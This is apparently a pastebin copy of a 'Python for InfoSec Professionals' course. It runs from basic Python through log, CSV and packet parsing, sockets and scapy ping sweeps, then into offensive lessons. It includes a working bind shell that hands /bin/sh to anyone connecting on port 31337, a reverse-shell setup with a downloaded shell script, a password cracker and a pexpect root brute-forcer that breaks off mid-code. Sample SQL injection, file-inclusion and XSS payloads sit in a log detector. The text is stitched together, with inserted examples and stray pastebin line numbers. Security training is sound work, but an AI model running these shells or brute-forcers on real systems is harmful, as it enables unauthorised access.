joemccray

Python For InfoSec Professionals

Mar 31st, 2015
#########################################
# Here is the courseware for this month #
#########################################

Class powerpoint slides:
https://s3.amazonaws.com/infosecaddictsfiles/PythonV3-1.pptx


Courseware Lab Manual
https://s3.amazonaws.com/infosecaddictsfiles/Python-For-InfoSec-Pros-2015.pdf


Class Videos:
https://s3.amazonaws.com/infosecaddictsvideos/2017-07-31+09.32+Python+for+InfoSec+Professionals.mp4
https://s3.amazonaws.com/infosecaddictsvideos/2017-08-01+09.40+Python+for+InfoSec+Professionals.mp4
https://s3.amazonaws.com/infosecaddictsvideos/2017-08-02+09.37+Python+for+InfoSec+Professionals.mp4
https://s3.amazonaws.com/infosecaddictsvideos/2017-08-03+10.29+Python+for+InfoSec+Professionals.mp4


Resource files:
https://s3.amazonaws.com/infosecaddictsfiles/Python4SecurityPros-Files.zip


https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
username: strategicsec
password: strategicsec


The youtube video playlist that I'd like for you to watch is located here:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA


#####################
# Installing Python #
#####################
Windows
32-Bit Version
http://www.python.org/ftp/python/2.7.5/python-2.7.5.msi

64-Bit Version
http://www.python.org/ftp/python/2.7.5/python-2.7.5.amd64.msi

After you install Python in Windows the next thing you may want to install is IdleX:
http://idlex.sourceforge.net/features.html


Linux
Debian/Ubuntu: sudo apt-get install -y python
RHEL/CentOS/Fedora: sudo yum install -y python

After you install Python in Linux the next thing that you will need to do is install idle.

sudo apt-get install -y idle

Open IDLE, and let's just dive right in.


#############################
# Lesson 1: Simple Printing #
#############################

>>> print "Today we are learning Python."



#####################################
# Lesson 2: Simple Numbers and Math #
#####################################

>>> 2+2

>>> 6-3

>>> 18/7

>>> 18.0/7

>>> 18.0/7.0

>>> 18/7

>>> 9%4

>>> 8%4

>>> 8.75%.5

>>> 6.*7

>>> 6*6*6

>>> 6**3

>>> 5**12

>>> -5**4



#######################
# Lesson 3: Variables #
#######################

>>> x=18

>>> x+15

>>> x**3

>>> y=54

>>> x+y

>>> g=input("Enter number here: ")
43

>>> g+32

>>> g**3



###################################
# Lesson 4: Modules and Functions #
###################################

>>> 5**4

>>> pow(5,4)

>>> abs(-18)

>>> abs(5)

>>> floor(18.7)

>>> import math

>>> math.floor(18.7)

>>> math.sqrt(81)

>>> joe = math.sqrt

>>> joe(9)

>>> joe=math.floor

>>> joe(19.8)



##################################
# Lesson 5: How to Save Programs #
##################################
Run "IDLE (Python GUI)"

File -> New Window

print "Python for InfoSec"

File -> Save as
py4InfoSec.py

Run -> Run Module or Press "F5"



Create a file name.py

x = raw_input("Enter name: ")
print "Hey " + x
raw_input("Press<enter>")


Run -> Run Module or Press "F5"



#####################
# Lesson 6: Strings #
#####################

>>> "XSS"

>>> 'SQLi'

>>> "Joe's a python lover"

>>> 'Joe\'s a python lover'

>>> "Joe said \"InfoSec is fun\" to me"

>>> a = "Joe"

>>> b = "McCray"

>>> a, b

>>> a+b



##########################
# Lesson 7: More Strings #
##########################

>>> num = 10

>>> num + 2

>>> "The number of open ports found on this system is " + num

>>> num = str(18)

>>> "There are " + num + " vulnerabilities found in this environment."

>>> num2 = 46

>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`



#######################
# Lesson 8: Raw Input #
#######################
Run "IDLE (Python GUI)"

File -> New Window

joemccray=input("Enter name: ")
print joemccray



Run -> Run Module # Will throw an error
or
Press "F5"

File -> New Window
joemccray=raw_input("Enter name: ")

Run -> Run Module # Will throw an error

or

Press "F5"

NOTE:
Use input() for integers and expressions, and use raw_input() when you are dealing with strings.



#################################
# Lesson 9: Sequences and Lists #
#################################

>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks
['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']

>>> attacks[3]
'SQL Injection'

>>> attacks[-2]
'Cross-Site Scripting'



###########################
# Lesson 10: If Statement #
###########################
Run "IDLE (Python GUI)"

File -> New Window
attack="SQLI"
if attack=="SQLI":
    print 'The attacker is using SQLI'



Run -> Run Module or Press "F5"

File -> New Window
attack="XSS"
if attack=="SQLI":
    print 'The attacker is using SQLI'


Run -> Run Module or Press "F5"



#############################
# Reference Videos To Watch #
#############################
Here is your first set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)



####################################
# Lesson 11: Intro to Log Analysis #
####################################

Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:

https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
username: strategicsec
password: strategicsec

Then execute the following commands:
---------------------------------------------------------------------------------------------------------

NOTE: If you are still in your python interpreter then you must type exit() to get back to a regular command-prompt.

wget http://pastebin.com/raw/85zZ5TZX

mv 85zZ5TZX access_log


cat access_log | grep 141.101.80.188

cat access_log | grep 141.101.80.187

cat access_log | grep 108.162.216.204

cat access_log | grep 173.245.53.160

---------------------------------------------------------

Google the following terms:
- Python read file
- Python read line
- Python read from file



########################################################
# Lesson 12: Use Python to read in a file line by line #
########################################################


Reference:
http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/



---------------------------------------------------------
vi logread1.py


## Open the file with read only permit
f = open('access_log', "r")

## use readlines to read all lines in the file
## The variable "lines" is a list containing all lines
lines = f.readlines()

print lines


## close the file after reading the lines.
f.close()

---------------------------------------------------------


Google the following:
- python difference between readlines and readline
- python readlines and readline



################################
# Lesson 13: A quick challenge #
################################

Can you write an if/then statement that looks for this IP and print "Found it"?


141.101.81.187



---------------------------------------------------------
Hint 1: Use Python to look for a value in a list

Reference:
http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html



---------------------------------------------------------
Hint 2: Use Python to prompt for user input

Reference:
http://www.cyberciti.biz/faq/python-raw_input-examples/



---------------------------------------------------------
Hint 3: Use Python to search for a string in a list

Reference:
http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string



Here is my solution:
-------------------
$ python
>>> f = open('access_log', "r")
>>> lines = f.readlines()
>>> ip = '141.101.81.187'
>>> for string in lines:
...     if ip in string:
...         print(string)



Here is one student's solution - can you please explain each line of this code to me?
-------------------------------------------------------------------------------------
#!/usr/bin/python

f = open('access_log')

strUsrinput = raw_input("Enter IP Address: ")

for line in iter(f):
    ip = line.split(" - ")[0]
    if ip == strUsrinput:
        print line

f.close()



-------------------------------

Working with another student after class we came up with another solution:

#!/usr/bin/env python


# This line opens the log file
f=open('access_log',"r")

# This line takes each line in the log file and stores it as an element in the list
lines = f.readlines()


# This line stores the IP that the user types as a var called userinput
userinput = raw_input("Enter the IP you want to search for: ")



# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
for ip in lines:
    if ip.find(userinput) != -1:
        print ip



#################################################
# Lesson 14: Look for web attacks in a log file #
#################################################

In this lab we will look at the scan_log.py script, which scans a web server log for common hack attempts.
Supported attacks:
1. SQL Injection
2. Local File Inclusion
3. Remote File Inclusion
4. Cross-Site Scripting



wget https://s3.amazonaws.com/infosecaddictsfiles/scan_log.py

The usage for scan_log.py is simple. You feed it an apache log file.

cat scan_log.py | less (use your up/down arrow keys to look through the file)

Explain to me how this script works.
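
Added example (not scan_log.py and not part of the course files): a small detector for the four attack classes listed above, which also shows why the Lesson 13 substring searches can over-match an IP while a comparison on the parsed client field does not. The signatures and the SAMPLE_LOG lines are constructed for illustration; it runs under Python 2.7 and Python 3.

```python
import re

try:
    from urllib.parse import unquote_plus   # Python 3
except ImportError:
    from urllib import unquote_plus          # Python 2.7, as on the course VM

# Apache common/combined format: client ident user [time] "METHOD URL PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')

# Illustrative signatures only: one small pattern per attack class.
SIGNATURES = [
    ("SQL Injection", re.compile(
        r"union\s+(all\s+)?select|'\s*or\s+'?\d+'?\s*=\s*'?\d+|information_schema", re.I)),
    ("Local File Inclusion", re.compile(r"\.\./|/etc/passwd|boot\.ini", re.I)),
    ("Remote File Inclusion", re.compile(r"=\s*(https?|ftp)://", re.I)),
    ("Cross-Site Scripting", re.compile(r"<\s*script|onerror\s*=|javascript:", re.I)),
]


def parse_line(line):
    """Split one log line into fields; return None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ip, when, method, url, status, _size = m.groups()
    return {"ip": ip, "time": when, "method": method, "url": url, "status": int(status)}


def decode_url(url, max_rounds=3):
    """URL-decode repeatedly so double-encoded input (%253C -> %3C -> <) is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url


def classify(url):
    """Return the names of all signatures that match the decoded URL."""
    decoded = decode_url(url)
    return [name for name, pattern in SIGNATURES if pattern.search(decoded)]


def lines_for_ip(lines, wanted_ip):
    """Exact match on the client field, so 192.0.2.10 does not also match 192.0.2.101."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is not None and entry["ip"] == wanted_ip:
            hits.append(line)
    return hits


def scan(lines):
    """Return ([(ip, status, [attack names])], number_of_unparsed_lines)."""
    findings, unparsed = [], 0
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            unparsed += 1
            continue
        labels = classify(entry["url"])
        if labels:
            findings.append((entry["ip"], entry["status"], labels))
    return findings, unparsed


# Constructed sample lines (documentation address ranges), not taken from access_log.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Mar/2015:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '192.0.2.101 - - [31/Mar/2015:10:00:02 +0000] '
    '"GET /item.php?id=1%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 200 734',
    '198.51.100.7 - - [31/Mar/2015:10:00:03 +0000] '
    '"GET /page.php?file=../../../../etc/passwd HTTP/1.1" 404 210',
    '198.51.100.7 - - [31/Mar/2015:10:00:04 +0000] '
    '"GET /page.php?file=http://203.0.113.5/x.txt HTTP/1.1" 200 88',
    '203.0.113.9 - - [31/Mar/2015:10:00:05 +0000] '
    '"GET /search.php?q=%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 301',
    'this line is not in Apache log format',
]

if __name__ == "__main__":
    findings, unparsed = scan(SAMPLE_LOG)
    for ip, status, labels in findings:
        print("%s status=%d %s" % (ip, status, ", ".join(labels)))
    print("unparsed lines: %d" % unparsed)
    print("substring hits for 192.0.2.10: %d" % sum("192.0.2.10" in l for l in SAMPLE_LOG))
    print("exact hits for 192.0.2.10: %d" % len(lines_for_ip(SAMPLE_LOG, "192.0.2.10")))
```

To try it on the lab file, pass open('access_log').readlines() to scan() in place of SAMPLE_LOG.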



################################
# Lesson 15: Parsing CSV Files #
################################

Dealing with csv files

Reference:
http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/

Type the following commands:
---------------------------------------------------------------------------------------------------------

wget https://s3.amazonaws.com/infosecaddictsfiles/class_nessus.csv


Example 1 - Reading CSV files
-----------------------------
#To be able to read csv formatted files, we will first have to import the
#csv module.


import csv
with open('class_nessus.csv', 'rb') as f:
    reader = csv.reader(f)
    for row in reader:
        print row



Example 2 - Reading CSV files
-----------------------------
vi readcsv.py


#!/usr/bin/python
import csv     # imports the csv module
import sys     # imports the sys module

f = open(sys.argv[1], 'rb')   # opens the csv file
try:
    reader = csv.reader(f)    # creates the reader object
    for row in reader:        # iterates the rows of the file in order
        print row             # prints each row
finally:
    f.close()                 # closing



Example 3 - Reading CSV files
-----------------------------
vi readcsv2.py


#!/usr/bin/python
# This program reads the CSV file and displays its contents.


import csv

ifile = open('class_nessus.csv', "rb")
reader = csv.reader(ifile)

rownum = 0
for row in reader:
    # Save header row.
    if rownum == 0:
        header = row
    else:
        colnum = 0
        for col in row:
            print '%-8s: %s' % (header[colnum], col)
            colnum += 1

    rownum += 1

ifile.close()



python readcsv2.py | less



/---------------------------------------------------/
--------------------PARSING CSV FILES----------------
/---------------------------------------------------/

-------------TASK 1------------
vi readcsv3.py

#!/usr/bin/python
import csv
f = open('class_nessus.csv', 'rb')
try:
    rownum = 0
    reader = csv.reader(f)
    for row in reader:
        # Save header row.
        if rownum == 0:
            header = row
        else:
            colnum = 0
            if row[3].lower() == 'high':
                print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
        rownum += 1
finally:
    f.close()



python readcsv3.py | less

-------------TASK 2------------
vi readcsv4.py

#!/usr/bin/python
import csv
f = open('class_nessus.csv', 'rb')
try:
    print '/---------------------------------------------------/'
    rownum = 0
    hosts = {}
    reader = csv.reader(f)
    for row in reader:
        # Save header row.
        if rownum == 0:
            header = row
        else:
            colnum = 0
            if row[3].lower() == 'high' and row[4] not in hosts:
                hosts[row[4]] = row[4]
                print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6])
        rownum += 1
finally:
    f.close()


python readcsv4.py | less



#################################################
# Lesson 16: Parsing Packets with Python's DPKT #
#################################################
The first thing that you will need to do is install dpkt.

sudo apt-get install -y python-dpkt



Now cd to your courseware directory, and then cd into the subfolder '2-PCAP-Parsing/Resources'.
Run tcpdump to capture a .pcap file that we will use for the next exercise


sudo tcpdump -ni eth0 -s0 -w quick.pcap


--open another command prompt--
wget http://packetlife.net/media/library/12/tcpdump.pdf


Let's do something simple:


vi quickpcap.py
--------------------------------------------------------

#!/usr/bin/python
import dpkt

# Simple script to read the timestamps in a pcap file
# Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html

f = open("quick.pcap","rb")
pcap = dpkt.pcap.Reader(f)

for ts, buf in pcap:
    print ts

f.close()


--------------------------------------------------------

Now let's run the script we just wrote


python quickpcap.py



How dpkt breaks down a packet:

Reference:
http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html

src: The MAC address of SOURCE.
dst: The MAC address of DESTINATION.
type: The protocol type of contained ethernet payload.

The allowed values are listed in the file "ethernet.py",
such as:
a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data.
b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data.


References:
http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python



Ok - now let's have a look at pcapparsing.py

sudo tcpdump -ni eth0 -s0 -w capture-100.pcap


--open another command prompt--
wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf



Ok - now let's have a look at pcapparsing.py
--------------------------------------------------------

import socket
import dpkt
import sys
f = open('capture-100.pcap','rb')
pcapReader = dpkt.pcap.Reader(f)

for ts,data in pcapReader:
    ether = dpkt.ethernet.Ethernet(data)
    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise
    ip = ether.data
    tcp = ip.data
    src = socket.inet_ntoa(ip.src)
    srcport = tcp.sport
    dst = socket.inet_ntoa(ip.dst)
    dstport = tcp.dport
    print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport)

f.close()

--------------------------------------------------------



OK - let's run it:
python pcapparsing.py



Running this script might throw an error like this:

Traceback (most recent call last):
  File "pcapparsing.py", line 9, in <module>
    if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise


If it does, it is just because your packet has something in it that we didn't specify (maybe ICMP, or something).



Your homework for today...


Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports.



Your challenge is to fix the Traceback error

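
Added example (not pcapparsing.py, not dpkt, and not part of the course files): the same breakdown of pcap record, Ethernet header, IPv4 header and TCP/UDP ports done with only struct and socket, skipping frames that are not IPv4 and leaving the ports empty for protocols that have none, which are the cases that stop the script above. The capture is constructed in memory by build_sample_pcap(), a helper made up for this example, and an Ethernet link type is assumed.

```python
import socket
import struct

ETH_TYPE_IP = 0x0800
PROTO_NAMES = {1: "ICMP", 6: "TCP", 17: "UDP"}


def read_pcap(blob):
    """Yield (timestamp, frame) pairs from the bytes of a classic pcap file."""
    if blob[:4] == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif blob[:4] == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    offset = 24                                   # skip the 24-byte global header
    while offset + 16 <= len(blob):
        sec, usec, incl_len, _ = struct.unpack(endian + "IIII", blob[offset:offset + 16])
        frame = blob[offset + 16:offset + 16 + incl_len]
        if len(frame) < incl_len:                 # capture was cut off mid-record
            break
        offset += 16 + incl_len
        yield sec + usec / 1e6, frame


def summarize(ts, frame):
    """Return a dict for an IPv4 frame, or None for anything else (ARP, IPv6, runts)."""
    if len(frame) < 14 + 20:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_IP:
        return None                               # skip the frame instead of raising
    ip = frame[14:]
    version, ihl = ord(ip[0:1]) >> 4, (ord(ip[0:1]) & 0x0F) * 4
    if version != 4 or ihl < 20 or len(ip) < ihl:
        return None
    proto = ord(ip[9:10])
    frag_offset = struct.unpack("!H", ip[6:8])[0] & 0x1FFF
    info = {"ts": ts, "proto": PROTO_NAMES.get(proto, str(proto)),
            "src": socket.inet_ntoa(ip[12:16]), "dst": socket.inet_ntoa(ip[16:20]),
            "sport": None, "dport": None}
    l4 = ip[ihl:]
    # Only TCP and UDP carry ports, and only in the first fragment.
    if proto in (6, 17) and frag_offset == 0 and len(l4) >= 4:
        info["sport"], info["dport"] = struct.unpack("!HH", l4[:4])
    return info


def parse_capture(blob):
    """Return (list of per-packet dicts, number of frames skipped)."""
    rows, skipped = [], 0
    for ts, frame in read_pcap(blob):
        info = summarize(ts, frame)
        if info is None:
            skipped += 1
        else:
            rows.append(info)
    return rows, skipped


def _frame(eth_type, payload):
    # Constructed MAC addresses (locally administered).
    return (b"\x02\x00\x00\x00\x00\x02" + b"\x02\x00\x00\x00\x00\x01"
            + struct.pack("!H", eth_type) + payload)


def _ipv4(proto, src, dst, payload):
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, 0, 64, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst)) + payload


def build_sample_pcap():
    """Constructed capture: one TCP, one ARP, one UDP and one ICMP frame."""
    tcp = struct.pack("!HHIIBBHHH", 49152, 80, 0, 0, 0x50, 0x02, 8192, 0, 0)
    udp = struct.pack("!HHHH", 5353, 53, 8, 0)
    icmp = struct.pack("!BBHHH", 8, 0, 0, 1, 1)
    frames = [
        _frame(0x0800, _ipv4(6, "192.0.2.10", "198.51.100.20", tcp)),
        _frame(0x0806, b"\x00" * 28),             # ARP: not IPv4, must be skipped
        _frame(0x0800, _ipv4(17, "192.0.2.10", "198.51.100.53", udp)),
        _frame(0x0800, _ipv4(1, "192.0.2.10", "198.51.100.20", icmp)),
    ]
    blob = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, fr in enumerate(frames):
        blob += struct.pack("<IIII", 1427790000 + i, 0, len(fr), len(fr)) + fr
    return blob


if __name__ == "__main__":
    rows, skipped = parse_capture(build_sample_pcap())
    for r in rows:
        print("%.6f %s %s:%s -> %s:%s" % (r["ts"], r["proto"], r["src"], r["sport"],
                                          r["dst"], r["dport"]))
    print("skipped non-IPv4 frames: %d" % skipped)
```

To run it against a real capture, pass open('capture-100.pcap', 'rb').read() to parse_capture().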

#!/usr/bin/python

import pcapy
import dpkt
import sys
import socket
import struct

SINGLE_SHOT = False

# list all the network devices
pcapy.findalldevs()

iface = "eth0"
filter = "arp"
max_bytes = 1024
promiscuous = False
read_timeout = 100 # in milliseconds

pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout )
pc.setfilter( filter )

# callback for received packets
def recv_pkts( hdr, data ):
    packet = dpkt.ethernet.Ethernet( data )

    print type( packet.data )
    print "ipsrc: %s, ipdst: %s" %( \
        socket.inet_ntoa( packet.data.spa ), \
        socket.inet_ntoa( packet.data.tpa ) )

    print "macsrc: %s, macdst: %s " % (
        "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha),
        "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) )

if SINGLE_SHOT:
    header, data = pc.next()
    sys.exit(0)
else:
    packet_limit = -1 # infinite
    pc.loop( packet_limit, recv_pkts ) # capture packets



#############################
# Reference Videos To Watch #
#############################
Here is your second set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20)



#############################################
# Lesson 17: Python Sockets & Port Scanning #
#############################################


$ ncat -l -v -p 1234



--open another terminal--
python

>>> import socket
>>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
>>> s.connect(('localhost', 1234))
>>> s.send('Hello, world')
>>> data = s.recv(1024)
>>> s.close()

>>> print 'Received', data



########################################
# Lesson 18: TCP Client and TCP Server #
########################################

vi tcpclient.py



#!/usr/bin/python
# tcpclient.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hostport = ("127.0.0.1", 1337)
s.connect(hostport)
s.send("Hello\n")
buf = s.recv(1024)
print "Received", buf



vi tcpserver.py



#!/usr/bin/python
# tcpserver.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
hostport = ("", 1337)
s.bind(hostport)
s.listen(10)
while 1:
    cli,addr = s.accept()
    print "Connection from", addr
    buf = cli.recv(1024)
    print "Received", buf
    if buf == "Hello\n":
        cli.send("Server ID 1\n")
    # close every client connection, whether or not it sent the expected greeting
    cli.close()



python tcpserver.py


--open another terminal--
python tcpclient.py


########################################
# Lesson 19: UDP Client and UDP Server #
########################################

vi udpclient.py



#!/usr/bin/python
# udpclient.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostport = ("127.0.0.1", 1337)
s.sendto("Hello\n", hostport)
buf = s.recv(1024)
print buf



vi udpserver.py



#!/usr/bin/python
# udpserver.py

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
hostport = ("127.0.0.1", 1337)
s.bind(hostport)
while 1:
    buf, address = s.recvfrom(1024)
    print buf
    if buf == "Hello\n":
        s.sendto("Server ID 1\n", address)



python udpserver.py


--open another terminal--
python udpclient.py



###############################
# Lesson 20: Installing Scapy #
###############################

sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot


Reference Page For All Of The Commands We Will Be Running:
http://samsclass.info/124/proj11/proj17-scapy.html

Great slides for Scapy:
http://www.secdev.org/conf/scapy_csw05.pdf



To run Scapy interactively

sudo scapy



################################################
# Lesson 21: Sending ICMPv4 Packets with scapy #
################################################

In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:

i = IP()



This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:

i.display()



Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:

i.dst="10.65.75.49"

i.display()



Notice that scapy automatically fills in your machine's source IP address.

Use these commands to create an object named ic of type ICMP and display its properties:


ic = ICMP()

ic.display()



Use this command to send the packet onto the network and listen for a single packet in response. Note that the third character is the numeral 1, not a lowercase L:

sr1(i/ic)



This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. The response is shown, with ICMP type echo-reply.

The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.

Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):


sr1(i/ic/"YOUR NAME")


You should see a reply with a Raw section containing your name.



##############################################
# Lesson 22: Sending a UDP Packet with Scapy #
##############################################


Preparing the Target
$ ncat -ulvp 4444



--open another terminal--
In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:

u = UDP()

u.display()



This creates an object named u of type UDP, and displays its properties.

Execute these commands to change the destination port to 4444 and display the properties again:

i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer)

u.dport = 4444

u.display()



Execute this command to send the packet to the Windows machine:

send(i/u/"YOUR NAME SENT VIA UDP\n")



On the Windows target, you should see the message appear.



#######################################
# Lesson 23: Ping Sweeping with Scapy #
#######################################



#!/usr/bin/python
from scapy.all import *

TIMEOUT = 2
conf.verb = 0
for ip in range(0, 256):
    packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
    # You will need to change 10.10.30 above this line to the subnet for your network
    reply = sr1(packet, timeout=TIMEOUT)
    if not (reply is None):
        # the reply's source address is the host that answered
        print reply.src, "is online"
    else:
        print "Timeout waiting for %s" % packet[IP].dst



###############################################
# Checking out some scapy based port scanners #
###############################################

wget https://s3.amazonaws.com/infosecaddictsfiles/rdp_scan.py

cat rdp_scan.py

sudo python rdp_scan.py


######################################
# Dealing with conf.verb=0 NameError #
######################################

conf.verb = 0
NameError: name 'conf' is not defined

Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:

from scapy import *
to
from scapy.all import *



Reference:
http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html


conf.verb=0 is a verbosity setting (configuration/verbosity = conv



Here are some good Scapy references:
http://www.secdev.org/projects/scapy/doc/index.html
http://resources.infosecinstitute.com/port-scanning-using-scapy/
http://www.hackerzvoice.net/ouah/blackmagic.txt
http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html


  1267. ######################################
  1268. # Lesson 24: Bind and Reverse Shells #
  1269. ######################################
  1270. vi simplebindshell.py
  1271.  
  1272.  
#!/bin/python
import os,sys,socket

ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
print '-Creating socket..'
port = 31337
try:
    ls.bind(('', port))
    print '-Binding the port on '
    ls.listen(1)
    print '-Listening, '
    (conn, addr) = ls.accept()
    print '-Waiting for connection...'
    cli= conn.fileno()
    print '-Redirecting shell...'
    os.dup2(cli, 0)
    print 'In, '
    os.dup2(cli, 1)
    print 'Out, '
    os.dup2(cli, 2)
    print 'Err'
    print 'Done!'
    arg0='/bin/sh'
    arg1='-a'
    args=[arg0]+[arg1]
    os.execv(arg0, args)
except(socket.error):
    print 'fail\n'
    conn.close()
    sys.exit(1)
  1303.  
  1304.  
  1305.  
  1306.  
  1307.  
  1308.  
  1309.  
  1310. nc TARGETIP 31337
  1311.  
  1312.  
  1313.  
  1314. ---------------------
  1315. Preparing the target for a reverse shell
  1316. $ ncat -lvp 4444
  1317.  
  1318.  
  1319.  
  1320. --open another terminal--
  1321. wget https://www.trustedsec.com/files/simple_py_shell.py
  1322.  
  1323. vi simple_py_shell.py
  1324.  
  1325.  
  1326.  
  1327.  
  1328.  
  1329.  
  1330. -------------------------------
  1331. Tricky shells
  1332.  
  1333. Reference:
  1334. http://securityweekly.com/2011/10/python-one-line-shell-code.html
  1335. http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/
  1336.  
  1337.  
  1338.  
  1339.  
  1340.  
  1341.  
  1342. #############################
  1343. # Reference Videos To Watch #
  1344. #############################
  1345. Here is your third set of youtube videos that I'd like for you to watch:
  1346. https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)
  1347.  
  1348.  
  1349.  
  1350.  
  1351. #################################################
  1352. # Lesson 25: Python Functions & String Handling #
  1353. #################################################
  1354.  
  1355. Python can make use of functions:
  1356. http://www.tutorialspoint.com/python/python_functions.htm
  1357.  
  1358.  
  1359.  
  1360. Python can interact with the 'crypt' function used to create Unix passwords:
  1361. http://docs.python.org/2/library/crypt.html
  1362.  
  1363.  
  1364.  
  1365. Tonight we will see a lot of the split() method so be sure to keep the following references close by:
  1366. http://www.tutorialspoint.com/python/string_split.htm
  1367.  
  1368.  
  1369. Tonight we will see a lot of slicing so be sure to keep the following references close by:
  1370. http://techearth.net/python/index.php5?title=Python:Basics:Slices
  1371.  
  1372.  
  1373.  
  1374.  
  1375.  
  1376. ################################
  1377. # Lesson 26: Password Cracking #
  1378. ################################
  1379.  
  1380. wget https://s3.amazonaws.com/infosecaddictsfiles/htcrack.py
  1381.  
  1382. vi htcrack.py
  1383.  
  1384. vi list.txt
  1385.  
  1386. hello
  1387. goodbye
  1388. red
  1389. blue
  1390. yourname
  1391. tim
  1392. bob
  1393.  
  1394.  
  1395. htpasswd -nd yourname
  1396. - enter yourname as the password
  1397.  
  1398.  
  1399.  
  1400. python htcrack.py joe:7XsJIbCFzqg/o list.txt
  1401.  
  1402.  
  1403.  
  1404.  
  1405. sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc
  1406.  
  1407. rm -rf mechanize-0.2.5.tar.gz
  1408.  
  1409. sudo /bin/bash
  1410.  
  1411. passwd
  1412. ***set root password***
  1413.  
  1414.  
  1415.  
  1416.  
  1417. vi rootbrute.py
  1418.  
  1419.  
#!/usr/bin/env python

import sys
try:
    import pexpect
except(ImportError):
    print "\nYou need the pexpect module."
    print "http://www.noah.org/wiki/Pexpect\n"
    sys.exit(1)

#Change this if needed.
# LOGIN_ERROR = 'su: incorrect password'
LOGIN_ERROR = "su: Authentication failure"

def brute(word):
    print "Trying:",word
    child = pexpect.spawn('/bin/su')
    child.expect('Password: ')
    child.sendline(word)
    i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
    if i == 1:
        print "Incorrect Password"

    if i == 2:
        print "\n\t[!] Root Password:" ,word
        child.sendline ('id')
        print child.before
        child.interact()

if len(sys.argv) != 2:
    print "\nUsage : ./rootbrute.py <wordlist>"
    print "Eg: ./rootbrute.py words.txt\n"
    sys.exit(1)

try:
    words = open(sys.argv[1], "r").readlines()
except(IOError):
